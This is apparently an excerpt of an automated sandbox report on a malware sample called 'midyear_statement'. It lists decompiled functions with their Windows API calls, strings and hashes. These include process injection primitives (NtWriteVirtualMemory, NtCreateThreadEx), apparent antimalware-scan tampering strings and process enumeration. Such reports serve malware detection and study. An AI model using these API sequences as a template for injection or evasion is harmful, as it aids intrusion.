                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Handle$AddressModuleProc$CurrentMemoryProcessVirtual$Free$Read$AllocateCloseCounterLibraryLoadPerformanceQuery
                                                                                                                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Windows\System32\ntdll.dll$I_QueryTagInformation$Initialize$NtCreateThreadEx$NtOpenObjectAuditAlarm$NtOpenProcess$NtSetSecurityObject$NtWriteVirtualMemory$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
                                                                                                                                                                                          • API String ID: 4243884105-1854689126
                                                                                                                                                                                          • Opcode ID: 1a714b03e16877bfa88765d8dca16d88dd9382f7206fd5a050206c2d451e4bb0
                                                                                                                                                                                          • Instruction ID: 3a6d3c080f58bc2ed834ec3effca3bb6fcdda39348e7e4f2132b7aee456011ca
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a714b03e16877bfa88765d8dca16d88dd9382f7206fd5a050206c2d451e4bb0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AF24338A551198FEB11EBA4DC80FCEB3B9AF4560CF1442A59048BB214DB70FE65CF95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040B9B34 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,040B9DBB,?,?,040B9E4D,00000000,040B9F29), ref: 040B9B48
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 040B9B60
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 040B9B72
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 040B9B84
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 040B9B96
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 040B9BA8
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 040B9BBA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 040B9BCC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 040B9BDE
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 040B9BF0
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 040B9C02
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 040B9C14
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 040B9C26
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 040B9C38
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 040B9C4A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 040B9C5C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 040B9C6E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                                                                          • API String ID: 667068680-597814768
                                                                                                                                                                                          • Opcode ID: 64d1cf1153c521a308ba58094162f039fc9487ca691595fc35bbb226a1433c9b
                                                                                                                                                                                          • Instruction ID: 30e1d14eb698a6e12f6f72ffe37b34ee0282f36b0cb0ac5b4fa316c50cc7cf41
                                                                                                                                                                                          • Opcode Fuzzy Hash: 64d1cf1153c521a308ba58094162f039fc9487ca691595fc35bbb226a1433c9b
                                                                                                                                                                                          • Instruction Fuzzy Hash: EA31FFF05406109FEB01EFB5E885BA53BE8EB5A208B054975E180EF205D6BAA890CF5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A5878 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,040A72F4,040A0000,040CC790), ref: 040A5895
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 040A58AC
                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?), ref: 040A58DC
                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,040A72F4,040A0000,040CC790), ref: 040A5940
                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,040A72F4,040A0000,040CC790), ref: 040A5976
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,040A72F4,040A0000,040CC790), ref: 040A5989
                                                                                                                                                                                          • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,040A72F4,040A0000,040CC790), ref: 040A599B
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,040A72F4,040A0000,040CC790), ref: 040A59A7
                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,040A72F4,040A0000), ref: 040A59DB
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,040A72F4), ref: 040A59E7
                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 040A5A09
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                                          • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                                          • API String ID: 3245196872-1565342463
                                                                                                                                                                                          • Opcode ID: 8fa0fdc54b5f9d15c8b1b455f38d7f04cd53384b200073d1d83e5664b4e3ba02
                                                                                                                                                                                          • Instruction ID: 4ece900ae53d16df1c3826f07bdf1ded6a09d64acd7c37115478d7492ff7ae59
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fa0fdc54b5f9d15c8b1b455f38d7f04cd53384b200073d1d83e5664b4e3ba02
                                                                                                                                                                                          • Instruction Fuzzy Hash: FE416F71E00659BBDB10DEE8CC88ADEB7FCBF48348F0405A5E548FB241E634EA648B50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A5B48 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 040A5B58
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 040A5B65
                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 040A5B6B
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 040A5B96
                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 040A5BDD
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 040A5BED
                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 040A5C15
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 040A5C25
                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 040A5C4B
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 040A5C5B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                          • API String ID: 1599918012-2375825460
                                                                                                                                                                                          • Opcode ID: 4465b9c049f6acc033b0fe71c1bc8b8fae8fbe916bbec03758855ca2582882af
                                                                                                                                                                                          • Instruction ID: 0b59d7a91c45e09761a3f0d45664a9fc797e3d39b4677c761022c1268bbcd452
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4465b9c049f6acc033b0fe71c1bc8b8fae8fbe916bbec03758855ca2582882af
                                                                                                                                                                                          • Instruction Fuzzy Hash: 88317571E4025C7EFB25D6F49C85BDEB7EC9B04388F0441E1A604FA185E674EF688B50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A7F18 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 040A7F39
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DiskFreeSpace
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1705453755-0
                                                                                                                                                                                          • Opcode ID: 3261405b2ed2b2ab2c958c9c80080ad853df0981eae5853c2e6ffa55791d3cae
                                                                                                                                                                                          • Instruction ID: 915ff7ba18767d15d81af69b9c54ebc63942807eb104fd37c8487b4e1eafdac9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3261405b2ed2b2ab2c958c9c80080ad853df0981eae5853c2e6ffa55791d3cae
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C1112B5E00209AFDB00CF99CC80DEFF7F9FFC8204B54C559A414E7254E671AA018B90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040AA708 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 040AA726
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                          • Opcode ID: 8652817d83d320707a3fc63be9e7e301e39a0ac90db054d598b7f88b77d66beb
                                                                                                                                                                                          • Instruction ID: e1afdb28e273d1635696ace15060faca84681f5d0fc18d1aaae4606b77d448ec
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8652817d83d320707a3fc63be9e7e301e39a0ac90db054d598b7f88b77d66beb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CE0923570021827E710A5A85C80EEAB2AC975C218F04426AA908E7385EDA1ADA086A5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040AB6D0 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetVersionExA.KERNEL32(?,040CB106,00000000,040CB11E), ref: 040AB6DE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Version
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1889659487-0
                                                                                                                                                                                          • Opcode ID: ae80c64accf660eb26bbc0552008170798e2bd81a51f55580e44455f03b028fa
                                                                                                                                                                                          • Instruction ID: b0db9e9dd890f2059726f6fa985a43fe346870964a83f86563dfed7a884a0a5d
                                                                                                                                                                                          • Opcode Fuzzy Hash: ae80c64accf660eb26bbc0552008170798e2bd81a51f55580e44455f03b028fa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7BF01779948302CFE350DF68E440E1977E0FB49704F048A38E59CE7380E77CA8158B12
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040AA754 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,040ABDB6,00000000,040ABFCF,?,?,00000000,00000000), ref: 040AA767
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                          • Opcode ID: c30ab9afcc803be26c380c181a15d2dc83cb02ae3c0e93a310babb5a72a7d01f
                                                                                                                                                                                          • Instruction ID: 591b2ccd465284cfcd6dd2d36249e02bc1fb5f23ad5d81de33cbe75f7f1f0b49
                                                                                                                                                                                          • Opcode Fuzzy Hash: c30ab9afcc803be26c380c181a15d2dc83cb02ae3c0e93a310babb5a72a7d01f
                                                                                                                                                                                          • Instruction Fuzzy Hash: CED0A76630D2603AF31051AB6D84DBF9AFCCBC66F5F04843AF588D6151E201DC15DB71
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A9150 Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LocalTime
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 481472006-0
                                                                                                                                                                                          • Opcode ID: 55d25a43ec22de918725fd133b871e080edd18120f93c639a8c296fbe121a14f
                                                                                                                                                                                          • Instruction ID: bbe72d2ce759407bb4c665515aba2c5c55ef390aca9c43392abf721700ec0421
                                                                                                                                                                                          • Opcode Fuzzy Hash: 55d25a43ec22de918725fd133b871e080edd18120f93c639a8c296fbe121a14f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 12A0120040482005994033280C0217430506810524FC80B4168F8902D4E91F9230C093
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A20C4 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                                                                          • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                                                                                          • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                                                                          • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040AD1D8 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 040AD1E1
                                                                                                                                                                                            • Part of subcall function 040AD1AC: GetProcAddress.KERNEL32(00000000), ref: 040AD1C5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                          • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                                                          • API String ID: 1646373207-1918263038
                                                                                                                                                                                          • Opcode ID: 96821264da6551362b1ea5998778299fb31cce67617be275f15472aeb266fc31
                                                                                                                                                                                          • Instruction ID: 6df78bc5d8fa105731078b5faaeff2799fc423dd953a0efadf3a2664408c48f8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 96821264da6551362b1ea5998778299fb31cce67617be275f15472aeb266fc31
                                                                                                                                                                                          • Instruction Fuzzy Hash: F141186564A2046B32047FEEF4045677BDBDED965C360C01AB008BBE60DE74FCE28769
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040B6E1C Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ole32.dll), ref: 040B6E22
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 040B6E33
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 040B6E43
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 040B6E53
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 040B6E63
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 040B6E73
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 040B6E83
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                          • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                                                                          • API String ID: 667068680-2233174745
                                                                                                                                                                                          • Opcode ID: 24792e07a1d72189cb715aaab2dec05e46d6750a08ea6f7e79a995eec708ed3f
                                                                                                                                                                                          • Instruction ID: 1dc29d936c264a437b195823ccca517d7623a6ab9fdfeb15d7e2fadd198e62ac
